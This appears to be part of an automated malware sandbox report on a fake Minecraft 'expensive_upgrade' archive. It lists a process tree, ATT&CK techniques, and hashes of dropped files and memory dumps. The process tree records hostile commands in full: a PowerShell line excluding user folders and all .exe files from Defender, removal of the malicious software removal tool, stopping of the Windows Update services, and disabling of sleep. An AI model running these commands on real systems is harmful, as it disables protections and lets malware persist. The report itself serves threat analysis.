- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Runs regedit.exe
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2624
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2736
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2688
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4068
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4320
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1492
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2276
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5088
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:896
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1740
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4684
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2428
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4000

C:\Users\Admin\Desktop\expensive_upgrade\rar\UnRAR.exe
"C:\Users\Admin\Desktop\expensive_upgrade\rar\UnRAR.exe"
1⤵
PID:4284

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\expensive_upgrade\minecraft.jar"
1⤵
PID:4984

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\expensive_upgrade\minecraft.jar"
1⤵
PID:4852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp

Filesize
46B

MD5
26c4ff0cff67cfcbdba143b3a9c559a7

SHA1
e0dfefa4b4ed45f7f3fdf181e953c397b43de7fc

SHA256
b050f54c73b4195ebf8ef558fdca3ab649b124d32e52e78e4fa4f63805a6daa5

SHA512
b8c49e8647b71f33f4b15dd707dccdc2229313f2cc9525e76e398617afcaa4a06549418edd69a10d2d1391b0ffca9724176e87a0f939878dbacfdac0debb8604

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a316ebd4efa11d6b6daf6af0cc1aebce

SHA1
ab338dd719969c70590dbc039b90e2758c741762

SHA256
f7308f111e3910da5c34c4d06d78d692f44419f848f5bf886fd466d5a96ad014

SHA512
67a9b94b704222a1bbe02fa8780c6b9bd364c8581b693ca28c6a444fde160df216304426bacf6b01909b80540cf0add79669b7a88ca260a6fbc93c4742f36c5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Colos.vbs

Filesize
349B

MD5
f0cc5ba46f36fde2db8a6a09df403f6d

SHA1
28a06c0ff63a2ce9edca91972e9df062f857a692

SHA256
d0de99eb90ca444043b842f279fd7b8e70bdd2b4cbf415c7d12e137fe0970877

SHA512
27eb47e653ca09b4b9dbff0a9d1bc03e176521940b6ca19b046e016e7ae964fdf521dc29cd25c0f58d797402ce3ea89b7478dc1c293203d6541dae0102fead1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rar$DvD1329235f7rartemp\drivers.exe

Filesize
333KB

MD5
ea4f8034d8d3926c036b9a25a7854058

SHA1
fb5ea9b43238c6820969c1dd056bf200cfe38329

SHA256
d05ba07c14e118ffb0e2281a815f6ebbf4bb92303b9834af2a21f523cbe7ee47

SHA512
f57997188d212b8bf567bc4ed41e06c4be799b6e71f41c2b93ed1ce55fecf980d169497c9ca8a8be986010edb4201e065488efb68f982e013cfda3f3182ccc5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rar$DvD1329235f7rartemp\installer.exe

Filesize
2.6MB

MD5
fe763c7e45045f4df064d6fcf34f1a92

SHA1
b1485733820b2bbf16ad37b9b82118176639433c

SHA256
7869766ca7f327ef2161e91153fc6cddf204284dfe45095fbf8122c562db5f5e

SHA512
f1e99fa883b0484bd05288c0668f68a20be0c4f49e8f6160c4fba92bed06155b6c008f99a9c893980e7b4c93ecd48b1042c8b2d198b1f29f2b376a89721cfae6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vmeb05t0.sky.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\support.rar

Filesize
2.3MB

MD5
582330e1106b6ac06e74e498bb4944aa

SHA1
2b421c9ab5ef3de3ab9954cab6506f2eb379009f

SHA256
b8bb8c8a1d60025acdf5ca8993678f2eaebecb459fc0c7531d47e840e7ede5d8

SHA512
cd1ef66ab5021adf19207b4938cab05d6ab4e831f3fbfceec8d4363d83057937bcf8cfa047e8d7ed74706777d7d6b97e2ee3ec0323d609370adc079f7a1a2c00

Download Submit
C:\Users\Admin\Desktop\expensive_upgrade\kdothKgitz.bat

Filesize
179B

MD5
04b85eeba036f077e797af80af331a25

SHA1
ec8db3f6f6c3d132956445809936cb6abcddfc1f

SHA256
91aa985f4200af1492c91e66c6c5bf881a7909a746e2f9ed3dc1a98351eadd7c

SHA512
4b0972e71bd9301151416759ca2d1b37060c944408e00650cefa3259fd7501c1d9e76abc404707a984e88b0c04a8eac149ed2b1eba8e388773471d159e2a755c

Download Submit
C:\Users\Admin\Desktop\expensive_upgrade\kdotjgHwVC.bat

Filesize
88B

MD5
7b1393e73b77ebc1d037d7794f3f9c24

SHA1
6b97279a167e8b2f8e5c7f77f146673f017d4209

SHA256
2a55f1b8252ad32b68e4dd5a5a6506d8764ad7e89d8381768faf39352a351652

SHA512
b6c3a95e3c37bccc663502bb130dfbf926306be619ab4a272d95c0f2e08890d0e977599f52d8ef8716856a8ab7babba37db27e5e0cc9c7845db990678139d4b2

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
4KB

MD5
5cb3b7ff68a0ee7cbf5b78e785c912f4

SHA1
3d9efdc19a89957b42a39e0b72ff4be5668f3a2b

SHA256
f6703ef69442186bcb64be5dd33ba9a03d62e40957512fbfd81e7f97b95969db

SHA512
c4fedd2828c5d3739613f023ccc5b41330b0e3855e53c051e6a34a4bc7c5c92c0f6ddfee9c7071b0e76e63d1633a7485a1c98f0fb36414fe6069f57cbe18f425

Download Submit
memory/1756-238-0x0000000005A70000-0x0000000005B02000-memory.dmp

Filesize
584KB

Download
memory/1756-204-0x0000000005100000-0x0000000005166000-memory.dmp

Filesize
408KB

Download
memory/1756-178-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1756-299-0x0000000006A40000-0x0000000006FE4000-memory.dmp

Filesize
5.6MB

Download
memory/2428-313-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2428-309-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2428-310-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2428-311-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2428-312-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2428-316-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2440-132-0x000001F6F9530000-0x000001F6F9552000-memory.dmp

Filesize
136KB

Download
memory/4000-322-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4000-329-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4000-318-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4000-323-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4000-319-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4000-325-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4000-326-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4000-327-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4000-324-0x000002DC030A0000-0x000002DC030C0000-memory.dmp

Filesize
128KB

Download
memory/4000-317-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4000-321-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4000-328-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4000-320-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4568-298-0x00000214EE540000-0x00000214EE55C000-memory.dmp

Filesize
112KB

Download
memory/4568-296-0x00000214EE320000-0x00000214EE3D5000-memory.dmp

Filesize
724KB

Download
memory/4568-297-0x00000214EDEE0000-0x00000214EDEEA000-memory.dmp

Filesize
40KB

Download
memory/4568-304-0x00000214EE570000-0x00000214EE57A000-memory.dmp

Filesize
40KB

Download
memory/4568-300-0x00000214EE520000-0x00000214EE52A000-memory.dmp

Filesize
40KB

Download
memory/4568-301-0x00000214EE580000-0x00000214EE59A000-memory.dmp

Filesize
104KB

Download
memory/4568-302-0x00000214EE530000-0x00000214EE538000-memory.dmp

Filesize
32KB

Download
memory/4568-303-0x00000214EE560000-0x00000214EE566000-memory.dmp

Filesize
24KB

Download
memory/4568-295-0x00000214EE300000-0x00000214EE31C000-memory.dmp

Filesize
112KB

Download
memory/4852-353-0x0000027813F20000-0x0000027813F21000-memory.dmp

Filesize
4KB

Download
memory/4984-341-0x000001BC66CA0000-0x000001BC66CA1000-memory.dmp

Filesize
4KB

Download